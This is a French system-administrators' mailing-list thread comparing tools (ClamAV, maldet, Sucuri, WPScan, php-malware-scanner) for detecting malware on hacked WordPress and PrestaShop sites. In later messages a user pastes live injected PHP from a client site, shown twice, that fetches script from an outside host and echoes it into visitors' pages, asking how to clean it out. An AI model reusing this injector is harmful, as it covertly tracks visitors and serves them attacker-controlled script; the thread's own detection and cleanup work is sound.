Bonjour à tous :)
Pas mal de mes clients utilisent WordPress, et certains voient régulièrement leur site être compromis suite à l'exploitation d'une faille dans WordPress ou ses nombreux plugins. J'aimerais détecter les sites compromis avant qu'ils soient utilisés pour bombarder la terre entière de spam.
J'ai utilisé avec succès le service de detection de Sucuri (https://sucuri.net/) plusieurs fois, mais à 300 € / site / an c'est clairement pas dans les moyens de tous mes clients. Est-ce que vous connaissez des services ou softs équivalents ?
Merci,
Salut,
dans mon cas j'ai expérimenté clamav pour détecter si un wordpress (ou un hébergement web) est vérolé et ça marche plutôt pas mal (ça reste "une solution du pauvre" :'D) "Coup de chance", juste à l'instant je viens de remarquer une IP blacklistée pour un client à cause d'un envoi de spam, un coup de clamav et le résultat:
# clamscan -r --infected /home/toto/* /home/toto/www/wp-content/plugins/facebook-page-promoter-lightbox-premium/admin/global68.php: PHP.Trojan.Mailer-1 FOUND /home/toto/www/wp-content/plugins/facebook-page-promoter-lightbox-premium/admin/.model83.php: PHP.Trojan.Mailer-1 FOUND /home/toto/www/wp-content/cache/newsletter/.config.php: PHP.Trojan.Mailer-1 FOUND /home/toto/www/wp-content/wptouch-data/debug/.javascript.php: PHP.Trojan.Mailer-1 FOUND
J'ai testé aussi de coupler clamav avec un script inotify qui permet en temps réel de vérifier un fichier. Typiquement tu upload un fichier, le script inotify lance un scan dessus et en fonction du retour, tu fais de la quarantaine ou de la suppression etc ... avec pourquoi pas notification au client.
Si ça peut t'aider ou te donner des pistes :)
On 07/05/2015 09:04, Jonathan Leroy wrote:
Bonjour à tous :)
Pas mal de mes clients utilisent WordPress, et certains voient régulièrement leur site être compromis suite à l'exploitation d'une faille dans WordPress ou ses nombreux plugins. J'aimerais détecter les sites compromis avant qu'ils soient utilisés pour bombarder la terre entière de spam.
J'ai utilisé avec succès le service de detection de Sucuri (https://sucuri.net/) plusieurs fois, mais à 300 € / site / an c'est clairement pas dans les moyens de tous mes clients. Est-ce que vous connaissez des services ou softs équivalents ?
Merci,
Bonjour,
Moi j'utilise WPScan sur Kali-Linux.
Il est pas mal, ça permet de tester un wordpress et même essayer d'exploiter les failles.
Si tu fais juste un scan il te dira si tu as des plugins avec des failles connues ou pas.
quelques infos : http://kali4hackers.blogspot.fr/2013/05/wpscan-in-kali-linux-wpscan-is.html
si non tu peux aussi installer l'outil sur une distrubution autre que Kali : http://wpscan.org/
A+
Le 7 mai 2015 10:10, Florian Leleu florian.leleu@cognix-systems.com a écrit :
Salut,
dans mon cas j'ai expérimenté clamav pour détecter si un wordpress (ou un hébergement web) est vérolé et ça marche plutôt pas mal (ça reste "une solution du pauvre" :'D) "Coup de chance", juste à l'instant je viens de remarquer une IP blacklistée pour un client à cause d'un envoi de spam, un coup de clamav et le résultat:
# clamscan -r --infected /home/toto/*
/home/toto/www/wp-content/plugins/facebook-page-promoter-lightbox-premium/admin/global68.php: PHP.Trojan.Mailer-1 FOUND
/home/toto/www/wp-content/plugins/facebook-page-promoter-lightbox-premium/admin/.model83.php: PHP.Trojan.Mailer-1 FOUND /home/toto/www/wp-content/cache/newsletter/.config.php: PHP.Trojan.Mailer-1 FOUND /home/toto/www/wp-content/wptouch-data/debug/.javascript.php: PHP.Trojan.Mailer-1 FOUND
J'ai testé aussi de coupler clamav avec un script inotify qui permet en temps réel de vérifier un fichier. Typiquement tu upload un fichier, le script inotify lance un scan dessus et en fonction du retour, tu fais de la quarantaine ou de la suppression etc ... avec pourquoi pas notification au client.
Si ça peut t'aider ou te donner des pistes :)
On 07/05/2015 09:04, Jonathan Leroy wrote:
Bonjour à tous :)
Pas mal de mes clients utilisent WordPress, et certains voient régulièrement leur site être compromis suite à l'exploitation d'une faille dans WordPress ou ses nombreux plugins. J'aimerais détecter les sites compromis avant qu'ils soient utilisés pour bombarder la terre entière de spam.
J'ai utilisé avec succès le service de detection de Sucuri (https://sucuri.net/) plusieurs fois, mais à 300 € / site / an c'est clairement pas dans les moyens de tous mes clients. Est-ce que vous connaissez des services ou softs équivalents ?
Merci,
Liste de diffusion du FRsAG http://www.frsag.org/
pour information WPScan est sponsorisé par Sucuri (https://sucuri.net)
A+
Le 7 mai 2015 10:43, Bruno LEAL DE SOUSA bruno.ld.sousa@gmail.com a écrit :
Bonjour,
Moi j'utilise WPScan sur Kali-Linux.
Il est pas mal, ça permet de tester un wordpress et même essayer d'exploiter les failles.
Si tu fais juste un scan il te dira si tu as des plugins avec des failles connues ou pas.
quelques infos : http://kali4hackers.blogspot.fr/2013/05/wpscan-in-kali-linux-wpscan-is.html
si non tu peux aussi installer l'outil sur une distrubution autre que Kali : http://wpscan.org/
A+
Le 7 mai 2015 10:10, Florian Leleu florian.leleu@cognix-systems.com a écrit :
Salut,
dans mon cas j'ai expérimenté clamav pour détecter si un wordpress (ou un hébergement web) est vérolé et ça marche plutôt pas mal (ça reste "une solution du pauvre" :'D) "Coup de chance", juste à l'instant je viens de remarquer une IP blacklistée pour un client à cause d'un envoi de spam, un coup de clamav et le résultat:
# clamscan -r --infected /home/toto/*
/home/toto/www/wp-content/plugins/facebook-page-promoter-lightbox-premium/admin/global68.php: PHP.Trojan.Mailer-1 FOUND
/home/toto/www/wp-content/plugins/facebook-page-promoter-lightbox-premium/admin/.model83.php: PHP.Trojan.Mailer-1 FOUND /home/toto/www/wp-content/cache/newsletter/.config.php: PHP.Trojan.Mailer-1 FOUND /home/toto/www/wp-content/wptouch-data/debug/.javascript.php: PHP.Trojan.Mailer-1 FOUND
J'ai testé aussi de coupler clamav avec un script inotify qui permet en temps réel de vérifier un fichier. Typiquement tu upload un fichier, le script inotify lance un scan dessus et en fonction du retour, tu fais de la quarantaine ou de la suppression etc ... avec pourquoi pas notification au client.
Si ça peut t'aider ou te donner des pistes :)
On 07/05/2015 09:04, Jonathan Leroy wrote:
Bonjour à tous :)
Pas mal de mes clients utilisent WordPress, et certains voient régulièrement leur site être compromis suite à l'exploitation d'une faille dans WordPress ou ses nombreux plugins. J'aimerais détecter les sites compromis avant qu'ils soient utilisés pour bombarder la terre entière de spam.
J'ai utilisé avec succès le service de detection de Sucuri (https://sucuri.net/) plusieurs fois, mais à 300 € / site / an c'est clairement pas dans les moyens de tous mes clients. Est-ce que vous connaissez des services ou softs équivalents ?
Merci,
Liste de diffusion du FRsAG http://www.frsag.org/
-- Bruno LEAL DE SOUSA Administrateur Systèmes et Réseaux Co-fondateur et rédacteur de *Bidouille-IT* : http://bidouilleit.com
« L'échec est le fondement de la réussite. » - *Lao-Tseu*
Bonjour,
Le 07/05/2015 10:10, Florian Leleu a écrit :
J'ai testé aussi de coupler clamav avec un script inotify qui permet en temps réel de vérifier un fichier. Typiquement tu upload un fichier, le script inotify lance un scan dessus et en fonction du retour, tu fais de la quarantaine ou de la suppression etc ... avec pourquoi pas notification au client.
Clamav est une bonne solution que l'on utilise dans ma boite. Nous y ajoutons également des signatures complémentaires
http://sanesecurity.co.uk/usage/signatures/
Nous utilisons également maldet qui peut s'appuyer sur le moteur de clamav pour le scan des fichiers. Le seul soucis c'est qu'il ne fait que se servir du moteur et pas des signatures. Il faut donc scanner avec maldet et clamav. Une solution est d'utiliser les signatures de maldet dans clamav et de de scanner ses fichiers qu'avec ce dernier.
maldet offre aussi une protection temps réel à l'aide d'inotify, mais sur nos tests sur des serveurs mutualisés, ça a tendance à planter au bout de quelques jours. Nous avons donc conserver le cron qui analyse les fichiers des 2 derniers jours.
https://www.rfxn.com/projects/linux-malware-detect/
Sinon il est possible aussi de tester ses sites à l'aide de l'API google safe-browsing.
Le 7 mai 2015 15:44, Matthieu Duchemin alkahan@free.fr a écrit :
Clamav est une bonne solution que l'on utilise dans ma boite. Nous y ajoutons également des signatures complémentaires
http://sanesecurity.co.uk/usage/signatures/
Nous utilisons également maldet qui peut s'appuyer sur le moteur de clamav pour le scan des fichiers. Le seul soucis c'est qu'il ne fait que se servir du moteur et pas des signatures. Il faut donc scanner avec maldet et clamav. Une solution est d'utiliser les signatures de maldet dans clamav et de de scanner ses fichiers qu'avec ce dernier.
maldet offre aussi une protection temps réel à l'aide d'inotify, mais sur nos tests sur des serveurs mutualisés, ça a tendance à planter au bout de quelques jours. Nous avons donc conserver le cron qui analyse les fichiers des 2 derniers jours.
Merci, je regarde ça.
Sinon il est possible aussi de tester ses sites à l'aide de l'API google safe-browsing.
Pas con, je n'y avait pas pensé. Par contre chez moi les alertes Google arrivent souvent bien après la bataille...
Merci pour vos nombreuses réponses !
Le 7 mai 2015 10:10, Florian Leleu florian.leleu@cognix-systems.com a écrit :
dans mon cas j'ai expérimenté clamav pour détecter si un wordpress (ou un hébergement web) est vérolé et ça marche plutôt pas mal (ça reste "une solution du pauvre" :'D)
Je ne savais pas que ClamAV était capable de détecter ce genre de trucs, ça me semble être une bonne solution. Je vais lancer quelques tests.
Le 7 mai 2015 10:43, Bruno LEAL DE SOUSA bruno.ld.sousa@gmail.com a écrit :
Moi j'utilise WPScan sur Kali-Linux.
Je ne connaissais pas WPScan, je vais tester ça. Mais apparement ça ne fait que scanner le code HTML du site, pas les fichiers PHP directement. Du coup c'est plus quelque chose à utiliser en complément de ClamAV.
Bonjour,
J'en ai codé un suite à trop de piratages Wordpress chez mes clients, le soucis c'est que beaucoup de scripts PHP sont codés avec les pieds qui sortent en faux positifs et que les malwares évoluent pour mieux se cacher.
C'est en python, avec un système de règles et scoring, si ça intéresse qqn je peux le mettre sur github.
Fred
Le 2015-05-07 09:04, Jonathan Leroy a écrit :
Bonjour à tous :)
Pas mal de mes clients utilisent WordPress, et certains voient régulièrement leur site être compromis suite à l'exploitation d'une faille dans WordPress ou ses nombreux plugins. J'aimerais détecter les sites compromis avant qu'ils soient utilisés pour bombarder la terre entière de spam.
J'ai utilisé avec succès le service de detection de Sucuri (https://sucuri.net/) plusieurs fois, mais à 300 € / site / an c'est clairement pas dans les moyens de tous mes clients. Est-ce que vous connaissez des services ou softs équivalents ?
Merci,
On May 7, 2015 8:00:18 PM GMT+02:00, "Frédéric VANNIÈRE" f.vanniere@planet-work.com wrote:
Bonjour,
J'en ai codé un suite à trop de piratages Wordpress chez mes clients, le soucis c'est que beaucoup de scripts PHP sont codés avec les pieds qui sortent en faux positifs et que les malwares évoluent pour mieux se cacher.
C'est en python, avec un système de règles et scoring, si ça intéresse qqn je peux le mettre sur github.
Tu peux expliquer en quoi tu fais mieux que l'existant rapidement stp ?
Merci !
-jlh
Fred
Le 2015-05-07 09:04, Jonathan Leroy a écrit :
Bonjour à tous :)
Pas mal de mes clients utilisent WordPress, et certains voient régulièrement leur site être compromis suite à l'exploitation d'une faille dans WordPress ou ses nombreux plugins. J'aimerais détecter les sites compromis avant qu'ils soient utilisés pour bombarder la terre entière de spam.
J'ai utilisé avec succès le service de detection de Sucuri (https://sucuri.net/) plusieurs fois, mais à 300 € / site / an c'est clairement pas dans les moyens de tous mes clients. Est-ce que vous connaissez des services ou softs équivalents ?
Merci,
-- Frédéric VANNIÈRE
PLANET-WORK 231 rue Saint-Honoré 75001 PARIS - FRANCE
Tél : 01 41 79 78 60 Fax : 01 41 79 78 61 Web : http://www.planet-work.fr/
Planet-Work, votre hébergeur depuis 1999 _______________________________________________ Liste de diffusion du FRsAG http://www.frsag.org/
-jlh
Voilà, c'est sur github :
https://github.com/planet-work/php-malware-scanner
Il y a un dossier samples, certains échantillons font peur, comme :
https://github.com/planet-work/php-malware-scanner/blob/master/samples/CREDI...
Le 2015-05-08 10:34, Jeremie Le Hen a écrit :
Tu peux expliquer en quoi tu fais mieux que l'existant rapidement stp ?
Aucune idée, il fonctionne plutôt bien, il y a le script "test" pour voir ce qu'il détecte dans les échantillons, ClamAV ne détecte même pas 10 fichiers infectés sur les 41 échantillons.
Frédéric.
Le 8 mai 2015 à 12:23, Frédéric VANNIÈRE f.vanniere@planet-work.com a écrit :
Voilà, c'est sur github :
Petit déterrage de ce thread pour dire que j'ai à nouveau eu un client dont le site PrestaShop a été vérolé de tous les côtés il y a quelques semaines.
J'ai fait des scans avec Sucuri, Virusdie et php-malware-scanner: seul ce dernier a trouvé quasiment tous les fichiers infectés :) J'essaierai de faire une PR pour les quelques fichiers qui n'ont pas été détectés dès que j'ai un peu de temps.
Le vendredi 21 avril 2017 à 11:54:22 (+0200), Jonathan Leroy a écrit :
Le 8 mai 2015 à 12:23, Frédéric VANNIÈRE f.vanniere@planet-work.com a écrit :
Voilà, c'est sur github :
Petit déterrage de ce thread pour dire que j'ai à nouveau eu un client dont le site PrestaShop a été vérolé de tous les côtés il y a quelques semaines.
J'ai fait des scans avec Sucuri, Virusdie et php-malware-scanner: seul ce dernier a trouvé quasiment tous les fichiers infectés :) J'essaierai de faire une PR pour les quelques fichiers qui n'ont pas été détectés dès que j'ai un peu de temps.
Salut,
On m'a dit du bien de https://github.com/rfxn/linux-malware-detect/
Est-ce que tu pourrais essayer avec pour comparer également ?
Le 21 avril 2017 à 12:01, Christophe Moille whilelm@doomfr.com a écrit :
Salut,
On m'a dit du bien de https://github.com/rfxn/linux-malware-detect/
Est-ce que tu pourrais essayer avec pour comparer également ?
Déjà fait (voir mon mail du 20/05/2015) : maldet n'est pas adapté pour les scripts PHP, il ne retourne que des faux postitifs. Je n'ai pas re-testé depuis, ceci dit.
Spécialement pour les scripts PHP : https://github.com/nexylan/PHPAV
Ce n'est pas parfait, mais on a un bon taux de détection.
Gaëtan
Le 21 avril 2017 à 12:08, Jonathan Leroy jonathan@unsigned.inikup.com a écrit :
Le 21 avril 2017 à 12:01, Christophe Moille whilelm@doomfr.com a écrit :
Salut,
On m'a dit du bien de https://github.com/rfxn/linux-malware-detect/
Est-ce que tu pourrais essayer avec pour comparer également ?
Déjà fait (voir mon mail du 20/05/2015) : maldet n'est pas adapté pour les scripts PHP, il ne retourne que des faux postitifs. Je n'ai pas re-testé depuis, ceci dit.
-- Jonathan Leroy. _______________________________________________ Liste de diffusion du FRsAG http://www.frsag.org/
Bien le bonsoir,
J'ai suis tombé sur cet outils et comme le sujet a été évoqué récemment, je le partage :
http://www.kitploit.com/2017/05/web-exploit-detector-tool-to-detect.html
Par contre, je ne l'ai pas testé, je ne sais pas ce qu'il vaut.
Bonne soirée
Pierre-Yves
Le 21/04/2017 à 13:52, Gaetan Allart a écrit :
Spécialement pour les scripts PHP : https://github.com/nexylan/PHPAV
Ce n'est pas parfait, mais on a un bon taux de détection.
Gaëtan
Le 21 avril 2017 à 12:08, Jonathan Leroy <jonathan@unsigned.inikup.com mailto:jonathan@unsigned.inikup.com> a écrit :
Le 21 avril 2017 à 12:01, Christophe Moille <whilelm@doomfr.com <mailto:whilelm@doomfr.com>> a écrit : > Salut, > > On m'a dit du bien de https://github.com/rfxn/linux-malware-detect/ <https://github.com/rfxn/linux-malware-detect/> > > Est-ce que tu pourrais essayer avec pour comparer également ? Déjà fait (voir mon mail du 20/05/2015) : maldet n'est pas adapté pour les scripts PHP, il ne retourne que des faux postitifs. Je n'ai pas re-testé depuis, ceci dit. -- Jonathan Leroy. _______________________________________________ Liste de diffusion du FRsAG http://www.frsag.org/--
Nexylan https://htmlsig.com/t/000001CMVYVA
Gaetan Allart / CEO gaetan@nexylan.com mailto:gaetan@nexylan.com / 0609219512
Nexylan 25 Rue Corneille 59100 Roubaix www.nexylan.com http://www.nexylan.com/
Liste de diffusion du FRsAG http://www.frsag.org/
Le 3 mai 2017 à 23:02, Pierre-Yves Dubreucq pydubreucq@odiso.com a écrit :
Bien le bonsoir,
Salut,
J'ai suis tombé sur cet outils et comme le sujet a été évoqué récemment, je le partage :
http://www.kitploit.com/2017/05/web-exploit-detector-tool-to-detect.html
Par contre, je ne l'ai pas testé, je ne sais pas ce qu'il vaut.
Je n'ai pas testé, mais deux remarques : - C'est du Node.js, qui n'est pas installé de base sous linux (sur mes serveurs en tout cas). Installer Node.js juste pour ça me dérange un peu. Je préfère justement les scripts Python/Perl/Bash justement pour éviter ça.
- J'ai regardé rapidement le code : les règles semblent très basiques pour le moment.
J'ai eu une demande de "nettoyage" de sites WordPress ayant été hackés hier.
J'en ai donc profité pour tester tous vos outils sur un des sites. Voici les résultats (outil : nombre de fichiers détectés) : - Maldet : 5 - ClamAV : 16 - ClamAV + signatures MalwarePatrol, SecuriteInfo, et Linux Malware Detect : 16 - Sucuri : 21 - php-malware-scanner : 22
Les 5 fichiers détectés par Maldet sont des faux positifs. Aucun autre outil n'a eu de faux positif. Je suis assez étonné car je m'attendais à ce que ce soit l'outil ayant les meilleurs résultats...
ClamAV avec ou sans signatures non-officielles donne grosso-modo les mêmes résultats (il y a eu quelques detections supplémentaires sur d'autres sites).
Le grand gagnant est php-malware-scanner de Frédéric, qui détecte deux fichiers de plus que Sucuri (mais en laisse passer un autre). J'ai mis un tableau comparatif en PJ pour ceux que ça intéresse :)
Salut,
beau boulot ^^ Il y a peut être moyen de "tuner" encore plus ClamAV pourqu'il détecte mieux les "malwares PHP". En tout cas beau résultat pour php-malware-scanner!
On 20/05/2015 07:14, Jonathan Leroy wrote:
J'ai eu une demande de "nettoyage" de sites WordPress ayant été hackés hier.
J'en ai donc profité pour tester tous vos outils sur un des sites. Voici les résultats (outil : nombre de fichiers détectés) :
- Maldet : 5
- ClamAV : 16
- ClamAV + signatures MalwarePatrol, SecuriteInfo, et Linux Malware Detect : 16
- Sucuri : 21
- php-malware-scanner : 22
Les 5 fichiers détectés par Maldet sont des faux positifs. Aucun autre outil n'a eu de faux positif. Je suis assez étonné car je m'attendais à ce que ce soit l'outil ayant les meilleurs résultats...
ClamAV avec ou sans signatures non-officielles donne grosso-modo les mêmes résultats (il y a eu quelques detections supplémentaires sur d'autres sites).
Le grand gagnant est php-malware-scanner de Frédéric, qui détecte deux fichiers de plus que Sucuri (mais en laisse passer un autre). J'ai mis un tableau comparatif en PJ pour ceux que ça intéresse :)
Liste de diffusion du FRsAG http://www.frsag.org/
Salut,
beau boulot ^^ Il y a peut être moyen de "tuner" encore plus ClamAV pourqu'il détecte mieux les "malwares PHP". En tout cas beau résultat pour php-malware-scanner!
En effet pas mal. Par contre je viens de tester php-malware-scanner sur une machine qui héberge une douzaine de cms, avec un trigger de '10', j'ai 84 résultats, dont à la louche 75 de faux positifs. A affiner donc :)
Maxence
On 20/05/2015 07:14, Jonathan Leroy wrote:
J'ai eu une demande de "nettoyage" de sites WordPress ayant été hackés hier.
J'en ai donc profité pour tester tous vos outils sur un des sites. Voici les résultats (outil : nombre de fichiers détectés) :
- Maldet : 5
- ClamAV : 16
- ClamAV + signatures MalwarePatrol, SecuriteInfo, et Linux Malware Detect : 16
- Sucuri : 21
- php-malware-scanner : 22
Les 5 fichiers détectés par Maldet sont des faux positifs. Aucun autre outil n'a eu de faux positif. Je suis assez étonné car je m'attendais à ce que ce soit l'outil ayant les meilleurs résultats...
ClamAV avec ou sans signatures non-officielles donne grosso-modo les mêmes résultats (il y a eu quelques detections supplémentaires sur d'autres sites).
Le grand gagnant est php-malware-scanner de Frédéric, qui détecte deux fichiers de plus que Sucuri (mais en laisse passer un autre). J'ai mis un tableau comparatif en PJ pour ceux que ça intéresse :)
Liste de diffusion du FRsAG http://www.frsag.org/
Liste de diffusion du FRsAG http://www.frsag.org/
-- Maxence DUNNEWIND Contact : maxence@dunnewind.net Site : http://www.dunnewind.net + 33 6 32 39 39 93 GPG : 18AE 61E4 D0B0 1C7C AAC9 E40D 4D39 68DB 0D2E B533
Bonjour,
des solutions comme Nessus (propriétaire) ou OpenVAS (fork libre) peuvent également aider à détecter des failles.
Patrice
"FRsAG" frsag-bounces@frsag.org a écrit sur 20/05/2015 10:04:07 :
Florian Leleu florian.leleu@cognix-systems.com Envoyé par : "FRsAG" frsag-bounces@frsag.org
20/05/2015 10:04
A
frsag@frsag.org
cc
Objet
Re: [FRsAG] Détecteurs de malwares
Salut,
beau boulot ^^ Il y a peut être moyen de "tuner" encore plus ClamAV pourqu'il détecte mieux les "malwares PHP". En tout cas beau résultat pour php-malware-scanner!
On 20/05/2015 07:14, Jonathan Leroy wrote: J'ai eu une demande de "nettoyage" de sites WordPress ayant été hackés
hier.
J'en ai donc profité pour tester tous vos outils sur un des sites. Voici les résultats (outil : nombre de fichiers détectés) :
- Maldet : 5
- ClamAV : 16
- ClamAV + signatures MalwarePatrol, SecuriteInfo, et Linux Malware
Detect : 16
- Sucuri : 21
- php-malware-scanner : 22
Les 5 fichiers détectés par Maldet sont des faux positifs. Aucun autre outil n'a eu de faux positif. Je suis assez étonné car je m'attendais à ce que ce soit l'outil ayant les meilleurs résultats...
ClamAV avec ou sans signatures non-officielles donne grosso-modo les mêmes résultats (il y a eu quelques detections supplémentaires sur d'autres sites).
Le grand gagnant est php-malware-scanner de Frédéric, qui détecte deux fichiers de plus que Sucuri (mais en laisse passer un autre). J'ai mis un tableau comparatif en PJ pour ceux que ça intéresse :)
-- Accédez aux meilleurs tarifs Air France, gérez vos réservations et enregistrez-vous en ligne sur http://www.airfrance.com Find best Air France fares, manage your reservations and check in online at http://www.airfrance.com Les données et renseignements contenus dans ce message peuvent être de nature confidentielle et soumis au secret professionnel et sont destinés à l'usage exclusif du destinataire dont les coordonnées figurent ci-dessus. Si vous recevez cette communication par erreur, nous vous demandons de ne pas la copier, l'utiliser ou la divulguer. Nous vous prions de notifier cette erreur à l'expéditeur et d'effacer immédiatement cette communication de votre système. Société Air France - Société anonyme au capital de 126 748 775 euros - RCS Bobigny (France) 420 495 178 - 45, rue de Paris, Tremblay-en-France, 95747 Roissy Charles de Gaulle CEDEX The data and information contained in this message may be confidential and subject to professional secrecy and are intended for the exclusive use of the recipient at the address shown above. If you receive this message by mistake, we ask you not to copy, use or disclose it. Please notify this error to the sender immediately and delete this message from your system. Société Air France - Limited company with capital of 126,748,775 euros - Bobigny register of companies (France) 420 495 178 - 45, rue de Paris, Tremblay-en-France, 95747 Roissy Charles de Gaulle CEDEX Pensez à l'environnement avant d'imprimer ce message. Think of the environment before printing this mail.
Le 20/05/2015 07:14, Jonathan Leroy a écrit :
J'ai eu une demande de "nettoyage" de sites WordPress ayant été hackés hier.
J'en ai donc profité pour tester tous vos outils sur un des sites.
Le grand gagnant est php-malware-scanner de Frédéric, qui détecte deux fichiers de plus que Sucuri (mais en laisse passer un autre). J'ai mis un tableau comparatif en PJ pour ceux que ça intéresse :)
Nice job !
Merci du retour. Julien
Hello,
Je me permet de relancer la discutions car j'ai presque le même problème avec un client.
Sauf que le code change sur presque tout les fichiers.
Voici un exemple de code :
<?php #568ba2# error_reporting(0); @ini_set('display_errors',0); $wp_f67188 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_f67188) && !preg_match ('/bot/i', $wp_f67188))){^M $wp_f0967188="http://"."theme"."header".".com/"."header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_f67188);^M if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_f0967188); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);^M $wp_67188f = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_67188f = @file_get_contents($wp_f0967188);}^M elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_67188f=@stream_get_contents(@fopen($wp_f0967188, "r"));}}^M if (substr($wp_67188f,1,3) === 'scr'){ echo $wp_67188f; } #458ba2# ?> Ou encore
<?php #5a9312#
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_f0967188); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);^M $wp_67188f = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_67188f = @file_get_contents($wp_f0967188);}^M elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_67188f=@stream_get_contents(@fopen($wp_f0967188, "r"));}}^M if (substr($wp_67188f,1,3) === 'scr'){ echo $wp_67188f; } #/5a9312# ?>
J'ai essayé beaucoup de sed et xargs, mais le code est trop complexe pour arrive a faire un truc propre.
find . -type f -name "*.php" -print | xargs sed -i.hacked 's/^<?php n#*# *?>//g'
Le seul point commun est un début <?php saute de ligne puis un # et en fin un autre # saute de ligne ?>
J’essaie d'utiliser https://github.com/planet-work/php-malware-scanner
Mais cela ne semble mal fonctionner avec mon problème.
Auriez vous une idée ?
Merci
Pierre
Le 20/05/2015 16:09, Julien Escario a écrit :
Le 20/05/2015 07:14, Jonathan Leroy a écrit :
J'ai eu une demande de "nettoyage" de sites WordPress ayant été hackés hier.
J'en ai donc profité pour tester tous vos outils sur un des sites.
Le grand gagnant est php-malware-scanner de Frédéric, qui détecte deux fichiers de plus que Sucuri (mais en laisse passer un autre). J'ai mis un tableau comparatif en PJ pour ceux que ça intéresse :)
Nice job !
Merci du retour. Julien
Liste de diffusion du FRsAG http://www.frsag.org/
Fait déjà commencer par désactiver certaines fonctionnalités dangereuses dans php (disabled_functions dans php.ini)
Ensuite bloquer les requêtes http sortantes du serveur avec iptables.
Le 3 juin 2015 à 11:23, Pierre pierre@infoserver4u.fr a écrit :
Hello,
Je me permet de relancer la discutions car j'ai presque le même problème avec un client.
Sauf que le code change sur presque tout les fichiers.
Voici un exemple de code :
<?php #568ba2# error_reporting(0); @ini_set('display_errors',0); $wp_f67188 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_f67188) && !preg_match ('/bot/i', $wp_f67188))){^M $wp_f0967188="http://"."theme"."header".".com/"."header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_f67188);^M if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_f0967188); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);^M $wp_67188f = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_67188f = @file_get_contents($wp_f0967188);}^M elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_67188f=@stream_get_contents(@fopen($wp_f0967188, "r"));}}^M if (substr($wp_67188f,1,3) === 'scr'){ echo $wp_67188f; } #458ba2# ?>
Ou encore
<?php #5a9312# if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_f0967188); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);^M $wp_67188f = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_67188f = @file_get_contents($wp_f0967188);}^M elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_67188f=@stream_get_contents(@fopen($wp_f0967188, "r"));}}^M if (substr($wp_67188f,1,3) === 'scr'){ echo $wp_67188f; } #/5a9312# ?>
J'ai essayé beaucoup de sed et xargs, mais le code est trop complexe pour arrive a faire un truc propre.
find . -type f -name "*.php" -print | xargs sed -i.hacked 's/^<?php n#*# *?>//g'
Le seul point commun est un début <?php saute de ligne puis un # et en fin un autre # saute de ligne ?>
J’essaie d'utiliser https://github.com/planet-work/php-malware-scanner
Mais cela ne semble mal fonctionner avec mon problème.
Auriez vous une idée ?
Merci
Pierre
Le 20/05/2015 16:09, Julien Escario a écrit :
Le 20/05/2015 07:14, Jonathan Leroy a écrit :
J'ai eu une demande de "nettoyage" de sites WordPress ayant été hackés hier.
J'en ai donc profité pour tester tous vos outils sur un des sites.
Le grand gagnant est php-malware-scanner de Frédéric, qui détecte deux fichiers de plus que Sucuri (mais en laisse passer un autre). J'ai mis un tableau comparatif en PJ pour ceux que ça intéresse :)
Nice job !
Merci du retour. Julien
Liste de diffusion du FRsAG http://www.frsag.org/
Liste de diffusion du FRsAG http://www.frsag.org/
Yes c’était fait, En soit le hacker ne pouvait pas vraiment utiliser les scripts.
Mais il faut nettoyer.
Après une longe matinée de recherche j'ai trouvé ce script :
https://www.ask-sheldon.com/find-and-replace-malware-code-blocks-in-php-file...
Mais j'ai un problème d'encodage UTF8 et j'avoue que je ne m'y connais pas grand chose en python
Voici l'erreur que cela fait quand il trouvé un fichier infecté :
HIT Traceback (most recent call last): File "./remove.py", line 38, in <module> replaceStringInFile(os.path.join(directory, filename)) File "./remove.py", line 19, in replaceStringInFile fContent = unicode(inputFile.read(), "utf-8") UnicodeDecodeError: 'utf8' codec can't decode byte 0xe9 in position 255: invalid continuation byte
Merci
Pierre
En soit le pi Le 03/06/2015 12:02, Guillaume Tournat a écrit :
Fait déjà commencer par désactiver certaines fonctionnalités dangereuses dans php (disabled_functions dans php.ini)
Ensuite bloquer les requêtes http sortantes du serveur avec iptables.
Le 3 juin 2015 à 11:23, Pierre pierre@infoserver4u.fr a écrit :
Hello,
Je me permet de relancer la discutions car j'ai presque le même problème avec un client.
Sauf que le code change sur presque tout les fichiers.
Voici un exemple de code :
